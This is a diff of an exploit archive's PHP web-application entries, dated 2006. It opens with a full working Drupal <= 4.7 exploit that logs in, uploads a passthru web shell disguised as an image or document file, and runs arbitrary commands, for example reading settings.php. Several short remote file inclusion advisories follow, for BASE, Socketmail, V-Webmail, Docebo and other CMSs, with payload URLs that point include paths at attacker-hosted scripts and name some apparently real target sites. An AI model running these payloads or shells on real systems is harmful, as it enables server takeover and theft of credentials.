-for ($x=0; $x<=count($ext)-1;$x++)
-{
-echo "Trying with ".$ext[$x]." extension...\r\n";
-$d=date("Y-m-d");
-$data='-----------------------------7d6381c1b00a2
-Content-Disposition: form-data; name="edit[title]"
-
-titolo
------------------------------7d6381c1b00a2
-Content-Disposition: form-data; name="edit[body]"
-
-corpo
------------------------------7d6381c1b00a2
-Content-Disposition: form-data; name="edit[format]"
-
-1
------------------------------7d6381c1b00a2
-Content-Disposition: form-data; name="edit[form_id]"
-
-story_node_form
------------------------------7d6381c1b00a2
-Content-Disposition: form-data; name="edit[name]"
-
-'.$user.'
------------------------------7d6381c1b00a2
-Content-Disposition: form-data; name="edit[date]"
-
-'.$d.' 23:59:59 +0000
------------------------------7d6381c1b00a2
-Content-Disposition: form-data; name="edit[status]"
-
-1
------------------------------7d6381c1b00a2
-Content-Disposition: form-data; name="edit[promote]"
-
-1
------------------------------7d6381c1b00a2
-Content-Disposition: form-data; name="edit[comment]"
-
-2
------------------------------7d6381c1b00a2
-Content-Disposition: form-data; name="edit[path]"
-
-
------------------------------7d6381c1b00a2
-Content-Disposition: form-data; name="edit[menu][title]"
-
-
------------------------------7d6381c1b00a2
-Content-Disposition: form-data; name="edit[menu][description]"
-
-
------------------------------7d6381c1b00a2
-Content-Disposition: form-data; name="edit[menu][pid]"
-
-1
------------------------------7d6381c1b00a2
-Content-Disposition: form-data; name="edit[menu][path]"
-
-
------------------------------7d6381c1b00a2
-Content-Disposition: form-data; name="edit[menu][weight]"
-
-0
------------------------------7d6381c1b00a2
-Content-Disposition: form-data; name="edit[menu][mid]"
-
-0
------------------------------7d6381c1b00a2
-Content-Disposition: form-data; name="edit[menu][type]"
-
-86
------------------------------7d6381c1b00a2
-Content-Disposition: form-data; name="edit[upload]"; filename="suntzu'.$anumber.$ext[$x].'"
-Content-Type: image/jpeg
-
-'.$shell.'
------------------------------7d6381c1b00a2
-Content-Disposition: form-data; name="fileop"
-
-Attach
------------------------------7d6381c1b00a2
-Content-Disposition: form-data; name="edit[fileop]"
-
-http://'.$host.$path.'?q=upload/js
------------------------------7d6381c1b00a2
-Content-Disposition: form-data; name="edit[vid]"
-
-
------------------------------7d6381c1b00a2--
-';
-
-$packet="POST ".$p."?q=upload/js HTTP/1.0\r\n";
-$packet.="Referer: http://".$host.$path."/?q=node/add/story\r\n";
-$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d6381c1b00a2\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Content-Length: ".strlen($data)."\r\n";
-$packet.="Cache-Control: no-cache\r\n";
-$packet.="Cookie: ".$cookie."\r\n";
-$packet.="Connection: Keep-Alive\r\n\r\n";
-$packet.=$data;
-//echo quick_dump($packet);
-sendpacketii($packet);
-
-$data='-----------------------------7d6318101b00a2
-Content-Disposition: form-data; name="edit[title]"
-
-titolo
------------------------------7d6318101b00a2
-Content-Disposition: form-data; name="edit[body]"
-
-corpo
------------------------------7d6318101b00a2
-Content-Disposition: form-data; name="edit[format]"
-
-1
------------------------------7d6318101b00a2
-Content-Disposition: form-data; name="edit[form_id]"
-
-story_node_form
------------------------------7d6318101b00a2
-Content-Disposition: form-data; name="edit[name]"
-
-'.$user.'
------------------------------7d6318101b00a2
-Content-Disposition: form-data; name="edit[date]"
-
-'.$d.' 23:59:59 +0000
------------------------------7d6318101b00a2
-Content-Disposition: form-data; name="edit[status]"
-
-1
------------------------------7d6318101b00a2
-Content-Disposition: form-data; name="edit[promote]"
-
-1
------------------------------7d6318101b00a2
-Content-Disposition: form-data; name="edit[comment]"
-
-2
------------------------------7d6318101b00a2
-Content-Disposition: form-data; name="edit[path]"
-
-
------------------------------7d6318101b00a2
-Content-Disposition: form-data; name="edit[menu][title]"
-
-
------------------------------7d6318101b00a2
-Content-Disposition: form-data; name="edit[menu][description]"
-
-
------------------------------7d6318101b00a2
-Content-Disposition: form-data; name="edit[menu][pid]"
-
-1
------------------------------7d6318101b00a2
-Content-Disposition: form-data; name="edit[menu][path]"
-
-
------------------------------7d6318101b00a2
-Content-Disposition: form-data; name="edit[menu][weight]"
-
-0
------------------------------7d6318101b00a2
-Content-Disposition: form-data; name="edit[menu][mid]"
-
-0
------------------------------7d6318101b00a2
-Content-Disposition: form-data; name="edit[menu][type]"
-
-86
------------------------------7d6318101b00a2
-Content-Disposition: form-data; name="edit[files][upload_0][list]"
-
-1
------------------------------7d6318101b00a2
-Content-Disposition: form-data; name="edit[files][upload_0][description]"
-
-hello.txt
------------------------------7d6318101b00a2
-Content-Disposition: form-data; name="edit[upload]"; filename=""
-Content-Type: image/jpeg
-
-
------------------------------7d6318101b00a2
-Content-Disposition: form-data; name="edit[fileop]"
-
-http://'.$host.$path.'?q=upload/js
------------------------------7d6318101b00a2
-Content-Disposition: form-data; name="edit[vid]"
-
-
------------------------------7d6318101b00a2
-Content-Disposition: form-data; name="op"
-
-Submit
------------------------------7d6318101b00a2--
-';
-
-$packet="POST ".$p."?q=node/add/story HTTP/1.0\r\n";
-$packet.="Referer: http://".$host.$path."/?q=node/add/story\r\n";
-$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d6318101b00a2\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Cache-Control: no-cache\r\n";
-$packet.="Content-Length: ".strlen($data)."\r\n";
-$packet.="Cookie: ".$cookie."\r\n";
-$packet.="Connection: Keep-Alive\r\n\r\n";
-$packet.=$data;
-//echo quick_dump($packet);
-sendpacketii($packet);
-
-$packet ="GET ".$p."files/suntzu".$anumber.$ext[$x]."?cmd=".$cmd." HTTP/1.0\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-//echo quick_dump($packet);
-sendpacketii($packet);
-if (strstr($html,"*deli*"))
-{echo "Exploit succeeded...\r\n";
- $temp=explode("*deli*",$html);
- die($temp[1]);
-}
-}
-//if you are here...
-echo "Exploit failed...";
-?>
-
-# milw0rm.com [2006-05-24]
+#!/usr/bin/php -q -d short_open_tag=on
+<?
+echo "Drupal <= 4.7 attachment mod_mime poc exploit\r\n";
+echo "by rgod rgod@autistici.org\r\n";
+echo "site: http://retrogod.altervista.org\r\n\r\n";
+
+/*
+this works with a user account with upload rights and with permissions to modify
+stories, however this is only a poc, you can do the same uploading an attachment,
+like this, with double extension, through all modules:
+
+attach.php.pps
+
+with this content:
+*/
+
+$shell=
+'<?php
+if (get_magic_quotes_gpc()){$_GET[cmd]=stripslashes($_GET[cmd]);}
+ini_set("max_execution_time",0);
+echo chr(0x2A).chr(0x64).chr(0x65).chr(0x6C).chr(0x69).chr(0x2A);
+passthru($_GET[cmd]);
+echo chr(0x2A).chr(0x64).chr(0x65).chr(0x6C).chr(0x69).chr(0x2A);
+?>';
+
+/*
+then:
+
+http://[target]/[path]/files/attach.php.pps?cmd=ls%20-la
+
+also, I noticed that from an admin account you can upload .php3 or .php5 files
+*/
+
+if ($argc<6) {
+echo "Usage: php ".$argv[0]." host path user pass cmd OPTIONS\r\n";
+echo "host:      target server (ip/hostname)\r\n";
+echo "path:      path to Drupal\r\n";
+echo "user-pass: valid credentials with upload rights\r\n";
+echo "cmd:       a shell command\r\n";
+echo "Options:\r\n";
+echo "   -p[port]:    specify a port other than 80\r\n";
+echo "   -P[ip:port]: specify a proxy\r\n";
+echo "Examples:\r\n";
+echo "php ".$argv[0]." localhost /drupal/ user password cat ./../sites/default/settings.php\r\n";
+echo "php ".$argv[0]." localhost /drupal/ user password ls -la -p81\r\n";
+echo "php ".$argv[0]." localhost / user password ls -la -P1.1.1.1:80\r\n";
+die;
+}
+
+ini_set("max_execution_time",0);
+ini_set("default_socket_timeout",5);
+
+function quick_dump($string)
+{
+  $result='';$exa='';$cont=0;
+  for ($i=0; $i<=strlen($string)-1; $i++)
+  {
+   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
+   {$result.="  .";}
+   else
+   {$result.="  ".$string[$i];}
+   if (strlen(dechex(ord($string[$i])))==2)
+   {$exa.=" ".dechex(ord($string[$i]));}
+   else
+   {$exa.=" 0".dechex(ord($string[$i]));}
+   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
+  }
+ return $exa."\r\n".$result;
+}
+$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
+function sendpacketii($packet)
+{
+  global $proxy, $host, $port, $html, $proxy_regex;
+  if ($proxy=='') {
+    $ock=fsockopen(gethostbyname($host),$port);
+    if (!$ock) {
+      echo 'No response from '.$host.':'.$port; die;
+    }
+  }
+  else {
+	$c = preg_match($proxy_regex,$proxy);
+    if (!$c) {
+      echo 'Not a valid proxy...';die;
+    }
+    $parts=explode(':',$proxy);
+    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
+    $ock=fsockopen($parts[0],$parts[1]);
+    if (!$ock) {
+      echo 'No response from proxy...';die;
+	}
+  }
+  fputs($ock,$packet);
+  if ($proxy=='') {
+    $html='';
+    while (!feof($ock)) {
+      $html.=fgets($ock);
+    }
+  }
+  else {
+    $html='';
+    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
+      $html.=fread($ock,1);
+    }
+  }
+  fclose($ock);
+  #debug
+  #echo "\r\n".$html;
+}
+
+function make_seed()
+{
+   list($usec, $sec) = explode(' ', microtime());
+   return (float) $sec + ((float) $usec * 100000);
+}
+
+$host=$argv[1];
+$path=$argv[2];
+$user=$argv[3];
+$pass=$argv[4];
+$cmd="";$port=80;$proxy="";
+
+for ($i=5; $i<=$argc-1; $i++){
+$temp=$argv[$i][0].$argv[$i][1];
+if (($temp<>"-p") and ($temp<>"-P"))
+{$cmd.=" ".$argv[$i];}
+if ($temp=="-p")
+{
+  $port=str_replace("-p","",$argv[$i]);
+}
+if ($temp=="-P")
+{
+  $proxy=str_replace("-P","",$argv[$i]);
+}
+}
+$cmd=urlencode($cmd);
+if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
+if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
+
+srand(make_seed());
+$anumber = rand(1,99999);
+
+  $data ="edit%5Bname%5D=".$user;
+  $data.="&edit%5Bpass%5D=".$pass;
+  $data.="&edit%5Bform_id%5D=user_login";
+  $data.="&op=Log%20in";
+  $packet="POST ".$path."?q=user/login&destination=node HTTP/1.0\r\n";
+  $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
+  $packet.="Accept-Encoding: gzip, deflate\r\n";
+  $packet.="Accept-Language: it\r\n";
+  $packet.="Referer: http://".$host.$path."\r\n";
+  $packet.="Host: ".$host."\r\n";
+  $packet.="Content-Length: ".strlen($data)."\r\n";
+  $packet.="Cache-Control: no-cache\r\n";
+  $packet.="Connection: close\r\n\r\n";
+  $packet.=$data;
+// echo quick_dump($packet);
+  sendpacketii($packet);
+  $temp=explode("Set-Cookie: ",$html);
+  $temp2=explode(" ",$temp[2]);
+  $cookie=$temp2[0];
+  echo "\r\nCookie -> ".$cookie."\r\n\r\n";
+
+
+$ext= array(".php.jpg",".php.jpeg",".php.gif", ".php.png",".php.txt",".php.html",".php.doc",".php.xls",".php.pdf",".php.ppt",".php.pps");
+
+for ($x=0; $x<=count($ext)-1;$x++)
+{
+echo "Trying with ".$ext[$x]." extension...\r\n";
+$d=date("Y-m-d");
+$data='-----------------------------7d6381c1b00a2
+Content-Disposition: form-data; name="edit[title]"
+
+titolo
+-----------------------------7d6381c1b00a2
+Content-Disposition: form-data; name="edit[body]"
+
+corpo
+-----------------------------7d6381c1b00a2
+Content-Disposition: form-data; name="edit[format]"
+
+1
+-----------------------------7d6381c1b00a2
+Content-Disposition: form-data; name="edit[form_id]"
+
+story_node_form
+-----------------------------7d6381c1b00a2
+Content-Disposition: form-data; name="edit[name]"
+
+'.$user.'
+-----------------------------7d6381c1b00a2
+Content-Disposition: form-data; name="edit[date]"
+
+'.$d.' 23:59:59 +0000
+-----------------------------7d6381c1b00a2
+Content-Disposition: form-data; name="edit[status]"
+
+1
+-----------------------------7d6381c1b00a2
+Content-Disposition: form-data; name="edit[promote]"
+
+1
+-----------------------------7d6381c1b00a2
+Content-Disposition: form-data; name="edit[comment]"
+
+2
+-----------------------------7d6381c1b00a2
+Content-Disposition: form-data; name="edit[path]"
+
+
+-----------------------------7d6381c1b00a2
+Content-Disposition: form-data; name="edit[menu][title]"
+
+
+-----------------------------7d6381c1b00a2
+Content-Disposition: form-data; name="edit[menu][description]"
+
+
+-----------------------------7d6381c1b00a2
+Content-Disposition: form-data; name="edit[menu][pid]"
+
+1
+-----------------------------7d6381c1b00a2
+Content-Disposition: form-data; name="edit[menu][path]"
+
+
+-----------------------------7d6381c1b00a2
+Content-Disposition: form-data; name="edit[menu][weight]"
+
+0
+-----------------------------7d6381c1b00a2
+Content-Disposition: form-data; name="edit[menu][mid]"
+
+0
+-----------------------------7d6381c1b00a2
+Content-Disposition: form-data; name="edit[menu][type]"
+
+86
+-----------------------------7d6381c1b00a2
+Content-Disposition: form-data; name="edit[upload]"; filename="suntzu'.$anumber.$ext[$x].'"
+Content-Type: image/jpeg
+
+'.$shell.'
+-----------------------------7d6381c1b00a2
+Content-Disposition: form-data; name="fileop"
+
+Attach
+-----------------------------7d6381c1b00a2
+Content-Disposition: form-data; name="edit[fileop]"
+
+http://'.$host.$path.'?q=upload/js
+-----------------------------7d6381c1b00a2
+Content-Disposition: form-data; name="edit[vid]"
+
+
+-----------------------------7d6381c1b00a2--
+';
+
+$packet="POST ".$p."?q=upload/js HTTP/1.0\r\n";
+$packet.="Referer: http://".$host.$path."/?q=node/add/story\r\n";
+$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d6381c1b00a2\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Content-Length: ".strlen($data)."\r\n";
+$packet.="Cache-Control: no-cache\r\n";
+$packet.="Cookie: ".$cookie."\r\n";
+$packet.="Connection: Keep-Alive\r\n\r\n";
+$packet.=$data;
+//echo quick_dump($packet);
+sendpacketii($packet);
+
+$data='-----------------------------7d6318101b00a2
+Content-Disposition: form-data; name="edit[title]"
+
+titolo
+-----------------------------7d6318101b00a2
+Content-Disposition: form-data; name="edit[body]"
+
+corpo
+-----------------------------7d6318101b00a2
+Content-Disposition: form-data; name="edit[format]"
+
+1
+-----------------------------7d6318101b00a2
+Content-Disposition: form-data; name="edit[form_id]"
+
+story_node_form
+-----------------------------7d6318101b00a2
+Content-Disposition: form-data; name="edit[name]"
+
+'.$user.'
+-----------------------------7d6318101b00a2
+Content-Disposition: form-data; name="edit[date]"
+
+'.$d.' 23:59:59 +0000
+-----------------------------7d6318101b00a2
+Content-Disposition: form-data; name="edit[status]"
+
+1
+-----------------------------7d6318101b00a2
+Content-Disposition: form-data; name="edit[promote]"
+
+1
+-----------------------------7d6318101b00a2
+Content-Disposition: form-data; name="edit[comment]"
+
+2
+-----------------------------7d6318101b00a2
+Content-Disposition: form-data; name="edit[path]"
+
+
+-----------------------------7d6318101b00a2
+Content-Disposition: form-data; name="edit[menu][title]"
+
+
+-----------------------------7d6318101b00a2
+Content-Disposition: form-data; name="edit[menu][description]"
+
+
+-----------------------------7d6318101b00a2
+Content-Disposition: form-data; name="edit[menu][pid]"
+
+1
+-----------------------------7d6318101b00a2
+Content-Disposition: form-data; name="edit[menu][path]"
+
+
+-----------------------------7d6318101b00a2
+Content-Disposition: form-data; name="edit[menu][weight]"
+
+0
+-----------------------------7d6318101b00a2
+Content-Disposition: form-data; name="edit[menu][mid]"
+
+0
+-----------------------------7d6318101b00a2
+Content-Disposition: form-data; name="edit[menu][type]"
+
+86
+-----------------------------7d6318101b00a2
+Content-Disposition: form-data; name="edit[files][upload_0][list]"
+
+1
+-----------------------------7d6318101b00a2
+Content-Disposition: form-data; name="edit[files][upload_0][description]"
+
+hello.txt
+-----------------------------7d6318101b00a2
+Content-Disposition: form-data; name="edit[upload]"; filename=""
+Content-Type: image/jpeg
+
+
+-----------------------------7d6318101b00a2
+Content-Disposition: form-data; name="edit[fileop]"
+
+http://'.$host.$path.'?q=upload/js
+-----------------------------7d6318101b00a2
+Content-Disposition: form-data; name="edit[vid]"
+
+
+-----------------------------7d6318101b00a2
+Content-Disposition: form-data; name="op"
+
+Submit
+-----------------------------7d6318101b00a2--
+';
+
+$packet="POST ".$p."?q=node/add/story HTTP/1.0\r\n";
+$packet.="Referer: http://".$host.$path."/?q=node/add/story\r\n";
+$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d6318101b00a2\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Cache-Control: no-cache\r\n";
+$packet.="Content-Length: ".strlen($data)."\r\n";
+$packet.="Cookie: ".$cookie."\r\n";
+$packet.="Connection: Keep-Alive\r\n\r\n";
+$packet.=$data;
+//echo quick_dump($packet);
+sendpacketii($packet);
+
+$packet ="GET ".$p."files/suntzu".$anumber.$ext[$x]."?cmd=".$cmd." HTTP/1.0\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+//echo quick_dump($packet);
+sendpacketii($packet);
+if (strstr($html,"*deli*"))
+{echo "Exploit succeeded...\r\n";
+ $temp=explode("*deli*",$html);
+ die($temp[1]);
+}
+}
+//if you are here...
+echo "Exploit failed...";
+?>
+
+# milw0rm.com [2006-05-24]
diff --git a/platforms/php/webapps/1823.txt b/platforms/php/webapps/1823.txt
index 6610d1a6d..194cd9a6b 100755
--- a/platforms/php/webapps/1823.txt
+++ b/platforms/php/webapps/1823.txt
@@ -1,32 +1,32 @@
-# Basic Analysis and Security Engine (BASE) <= 1.2.4 (melissa) Inclusion Vulnerabilities
-#   Just glanced over BASE for a pentesting job. /str0ke ! milw0rm.com
-##################################
-
-[code (base_qry_common.php)]
-   include_once("$BASE_path/includes/base_signature.inc.php");
-[/code]
-
-http://[site]/snort/base_qry_common.php?BASE_path=http://www.milw0rm.com/index.php?&
-
-########################################
-
-[code (base_stat_common.php)]
-   include_once("$BASE_path/includes/base_constants.inc.php");
-[/code]
-
-http://[site]/snort/base_stat_common.php?BASE_path=http://www.milw0rm.com/index.php?&
-
-###############################################
-
-[code (includes/base_include.inc.php)]
-   include_once("$BASE_path/includes/base_db.inc.php");
-   include_once("$BASE_path/includes/base_output_html.inc.php");
-   include_once("$BASE_path/includes/base_state_common.inc.php");
-   ...
-[/code]
-
-http://[site]/snort/includes/base_include.inc.php?BASE_path=http://www.milw0rm.com/index.php?&
-
-#######################################################
-
-# milw0rm.com [2006-05-25]
+# Basic Analysis and Security Engine (BASE) <= 1.2.4 (melissa) Inclusion Vulnerabilities
+#   Just glanced over BASE for a pentesting job. /str0ke ! milw0rm.com
+##################################
+
+[code (base_qry_common.php)]
+   include_once("$BASE_path/includes/base_signature.inc.php");
+[/code]
+
+http://[site]/snort/base_qry_common.php?BASE_path=http://www.milw0rm.com/index.php?&
+
+########################################
+
+[code (base_stat_common.php)]
+   include_once("$BASE_path/includes/base_constants.inc.php");
+[/code]
+
+http://[site]/snort/base_stat_common.php?BASE_path=http://www.milw0rm.com/index.php?&
+
+###############################################
+
+[code (includes/base_include.inc.php)]
+   include_once("$BASE_path/includes/base_db.inc.php");
+   include_once("$BASE_path/includes/base_output_html.inc.php");
+   include_once("$BASE_path/includes/base_state_common.inc.php");
+   ...
+[/code]
+
+http://[site]/snort/includes/base_include.inc.php?BASE_path=http://www.milw0rm.com/index.php?&
+
+#######################################################
+
+# milw0rm.com [2006-05-25]
diff --git a/platforms/php/webapps/1824.txt b/platforms/php/webapps/1824.txt
index d3cf0f24a..03888d00f 100755
--- a/platforms/php/webapps/1824.txt
+++ b/platforms/php/webapps/1824.txt
@@ -1,32 +1,32 @@
-################ DEVIL TEAM THE BEST POLISH TEAM #################
-#open-medium (0.25) - Content Management System - Remote File Include Vulnerabilities
-#Find by Kacper (Rahim).
-#Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
-#Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
-##################################################################
-[code]
-404.php:
-
-.......
-
-} else {
-// templates verwenden
-if
-(!@include($REDSYS["MYPATH"]["TEMPLATES"]."/redsys".$REDSYS["LanguagePath"]."/404.tmp"))
-{
-include($REDSYS["MYPATH"]["TEMPLATES"]."/redsys/404.tmp");
-}
-}
-
-?>
-
-[/code]
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
-http://www.site.com/[open-mediumCMS_path]/redsys/404.php?REDSYS[MYPATH][TEMPLATES]=[evil_scripts]
-
-
-###################################################################
-#Elo ;-)
-
-# milw0rm.com [2006-05-25]
+################ DEVIL TEAM THE BEST POLISH TEAM #################
+#open-medium (0.25) - Content Management System - Remote File Include Vulnerabilities
+#Find by Kacper (Rahim).
+#Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
+#Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
+##################################################################
+[code]
+404.php:
+
+.......
+
+} else {
+// templates verwenden
+if
+(!@include($REDSYS["MYPATH"]["TEMPLATES"]."/redsys".$REDSYS["LanguagePath"]."/404.tmp"))
+{
+include($REDSYS["MYPATH"]["TEMPLATES"]."/redsys/404.tmp");
+}
+}
+
+?>
+
+[/code]
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+http://www.site.com/[open-mediumCMS_path]/redsys/404.php?REDSYS[MYPATH][TEMPLATES]=[evil_scripts]
+
+
+###################################################################
+#Elo ;-)
+
+# milw0rm.com [2006-05-25]
diff --git a/platforms/php/webapps/1825.txt b/platforms/php/webapps/1825.txt
index 5108b5dff..576272e34 100755
--- a/platforms/php/webapps/1825.txt
+++ b/platforms/php/webapps/1825.txt
@@ -1,33 +1,33 @@
-################# DEVIL TEAM THE BEST POLISH TEAM ##################
-#
-#   Back-End CMS - Remote File Include Vulnerabilities
-#   Find by Kacper (Rahim).
-#   Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
-#   Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
-#   Site of script: http://www.back-end.org
-#
-####################################################################
-*/
-
-BE_config.php Line 27-31:
-
-[code]
-...
-  // Script timer
-  require_once($_PSL['classdir'] . '/BE_phpTimer.class');
-  $scriptTimer = & pslSingleton('phpTimer');
-  $scriptTimer->start('main');
-  /* Use Example
-...
-[/code]
-
-
-/*
-
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
-http://www.site.com/[Back-End_path]/BE_config.php?_PSL[classdir]=[evil_scripts]
-
-#Elo ;-)
-
-# milw0rm.com [2006-05-25]
+################# DEVIL TEAM THE BEST POLISH TEAM ##################
+#
+#   Back-End CMS - Remote File Include Vulnerabilities
+#   Find by Kacper (Rahim).
+#   Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
+#   Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
+#   Site of script: http://www.back-end.org
+#
+####################################################################
+*/
+
+BE_config.php Line 27-31:
+
+[code]
+...
+  // Script timer
+  require_once($_PSL['classdir'] . '/BE_phpTimer.class');
+  $scriptTimer = & pslSingleton('phpTimer');
+  $scriptTimer->start('main');
+  /* Use Example
+...
+[/code]
+
+
+/*
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+http://www.site.com/[Back-End_path]/BE_config.php?_PSL[classdir]=[evil_scripts]
+
+#Elo ;-)
+
+# milw0rm.com [2006-05-25]
diff --git a/platforms/php/webapps/1826.txt b/platforms/php/webapps/1826.txt
index a711692a2..503d15aa2 100755
--- a/platforms/php/webapps/1826.txt
+++ b/platforms/php/webapps/1826.txt
@@ -1,18 +1,18 @@
-Title: Socketmail <= 2.2.6 - Remote File Include Vulnerability
------------------------------------------------------------------
-Vendor: Creative Digital Resources
-URL: http://socketmail.com
------------------------------------------------------------------
-
-Credits:
-Discovered by: 'Aesthetico'
-http://www.majorsecurity.de
------------------------------------------------------------------
-Search for: "Powered by SocketMail"
------------------------------------------------------------------
-
-Exploitation(tested with Lite-Edition and Pro-Edition):
-
-/index.php?site_path=http://www.yourspace.com/yourscript.php?
-
-# milw0rm.com [2006-05-25]
+Title: Socketmail <= 2.2.6 - Remote File Include Vulnerability
+-----------------------------------------------------------------
+Vendor: Creative Digital Resources
+URL: http://socketmail.com
+-----------------------------------------------------------------
+
+Credits:
+Discovered by: 'Aesthetico'
+http://www.majorsecurity.de
+-----------------------------------------------------------------
+Search for: "Powered by SocketMail"
+-----------------------------------------------------------------
+
+Exploitation(tested with Lite-Edition and Pro-Edition):
+
+/index.php?site_path=http://www.yourspace.com/yourscript.php?
+
+# milw0rm.com [2006-05-25]
diff --git a/platforms/php/webapps/1827.txt b/platforms/php/webapps/1827.txt
index 671878688..00bac7c9d 100755
--- a/platforms/php/webapps/1827.txt
+++ b/platforms/php/webapps/1827.txt
@@ -1,19 +1,19 @@
-Script: V-Webmail 1.6.4
-Vendor: http://www.v-webmail.org/
-Description: V-webmail is a powerful PHP based webmail application with an
-abundance of features, including many innovative ideas for web applications
-Discovered: beford <xbefordx gmail com>
-Vulnerable File
-
-v-webmail/includes/pear/*/*.php => require_once ($CONFIG['pear_dir'] . '*.php');
-v-webmail/includes/mailaccess/pop3.php =>
-require_once($CONFIG['pear_dir'] . 'Net/POP3.php');
-
-Version 1.3
-http://www.site.th/vwebmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=http://evil
-http://www.woot.com.kh/webmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=http://evil
-
-Version 1.5  - 1.6.4
-http://something.ie/v-webmail/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://evil
-
-# milw0rm.com [2006-05-25]
+Script: V-Webmail 1.6.4
+Vendor: http://www.v-webmail.org/
+Description: V-webmail is a powerful PHP based webmail application with an
+abundance of features, including many innovative ideas for web applications
+Discovered: beford <xbefordx gmail com>
+Vulnerable File
+
+v-webmail/includes/pear/*/*.php => require_once ($CONFIG['pear_dir'] . '*.php');
+v-webmail/includes/mailaccess/pop3.php =>
+require_once($CONFIG['pear_dir'] . 'Net/POP3.php');
+
+Version 1.3
+http://www.site.th/vwebmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=http://evil
+http://www.woot.com.kh/webmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=http://evil
+
+Version 1.5  - 1.6.4
+http://something.ie/v-webmail/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://evil
+
+# milw0rm.com [2006-05-25]
diff --git a/platforms/php/webapps/1828.txt b/platforms/php/webapps/1828.txt
index c39a57792..75a8b8413 100755
--- a/platforms/php/webapps/1828.txt
+++ b/platforms/php/webapps/1828.txt
@@ -1,18 +1,18 @@
-Vulnerable Script: Docebo LMS 2.05
-Discovered: beford <xbefordx gmail com>
-
-Noobs: %22Based+on+DoceboLMS+2.0%22
-
-Vulnerable Files
-
-doceboLMS205/modules/credits/business.php =>
-include($_GET['lang'].'/language.php');
-
-doceboLMS205/modules/credits/credits.php =>
-include($_GET['lang'].'/language.php');
-
-doceboLMS205/modules/credits/help.php => include($_GET['lang'].'/language.php');
-
-http://www.oops.org/DOCEBO205/modules/credits/help.php?lang=http://<evilh4x0rscript>/?
-
-# milw0rm.com [2006-05-25]
+Vulnerable Script: Docebo LMS 2.05
+Discovered: beford <xbefordx gmail com>
+
+Noobs: %22Based+on+DoceboLMS+2.0%22
+
+Vulnerable Files
+
+doceboLMS205/modules/credits/business.php =>
+include($_GET['lang'].'/language.php');
+
+doceboLMS205/modules/credits/credits.php =>
+include($_GET['lang'].'/language.php');
+
+doceboLMS205/modules/credits/help.php => include($_GET['lang'].'/language.php');
+
+http://www.oops.org/DOCEBO205/modules/credits/help.php?lang=http://<evilh4x0rscript>/?
+
+# milw0rm.com [2006-05-25]
diff --git a/platforms/php/webapps/1829.txt b/platforms/php/webapps/1829.txt
index 44d48370f..8e3e7ae5e 100755
--- a/platforms/php/webapps/1829.txt
+++ b/platforms/php/webapps/1829.txt
@@ -1,183 +1,183 @@
-################ DEVIL TEAM THE BEST POLISH TEAM #################
-#APC ActionApps CMS (2.8.1) - Remote File Include Vulnerabilities
-#Find by Kacper (Rahim).
-#Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
-#Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
-#site: http://sourceforge.net/projects/apc-aa/
-##################################################################
-/*
-cached.php3:
-... (line:35)
-require_once $GLOBALS['AA_INC_PATH']."locsess.php3";
-...
-
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
-cron.php3:
-... (line:47)
-require_once $GLOBALS['AA_INC_PATH']."locsess.php3";
-...
-
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
-discussion.php3:
-... (line:80)
-require_once $GLOBALS['AA_INC_PATH']."easy_scroller.php3";
-...
-
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
-filldisc.php3:
-... (line:75)
-require_once $GLOBALS['AA_INC_PATH']."locsess.php3";
-...
-
-And more.......... ;-)
-
-*/
-
-expl:
-
-http://www.site.com/[APC_path]/cached.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
-http://www.site.com/[APC_path]/cron.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
-
